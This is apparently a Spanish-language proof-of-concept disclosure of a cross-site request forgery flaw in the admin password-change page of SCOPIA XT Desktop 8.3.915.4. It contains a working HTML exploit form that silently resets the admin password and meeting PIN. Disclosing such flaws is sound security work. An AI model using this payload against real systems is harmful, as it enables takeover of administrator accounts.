
Este PoC describirá cómo explotar Cross-Site Request Forgery (CSRF) en SCOPIA XT Desktop versión 8.3.915.4
sitio web: https://support.avaya.com/products/P1421/scopia-desktop/8.2.1
Cross-site request forgery, también conocido como ataque de un solo clic o session riding y abreviado como CSRF o XSRF, es un tipo de explotación maliciosa de un sitio web donde se transmiten comandos no autorizados desde un usuario en el que la aplicación web confía.
En la página "Directory and Authentication", el administrador puede cambiar su contraseña.
Al capturar la petición con Burp Suite pude ver que no se implementaba un token anti-CSRF y que el único mecanismo de seguridad es la cookie de sesión.
6
Creé este archivo HTML que sirvió como PoC para explotar la vulnerabilidad presentada.
<!DOCTYPE html>
<html>
<body>
<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
<input type="text" name="JSESSIONID" value="">
<input type="text" name="newadminusername" value="">
<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
<input type="text" name="newenablext1000meetingpin" value="false">
<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
<input type="text" name="checkstatus" value="true">
<input type="submit" value="Send">
</form>
</body>
</html>
Al ejecutarlo en el navegador que tiene una cookie válida para el entorno de administración de SCOPIA XT Desktop, fue posible cambiar la contraseña del usuario admin a "attacker":
4
5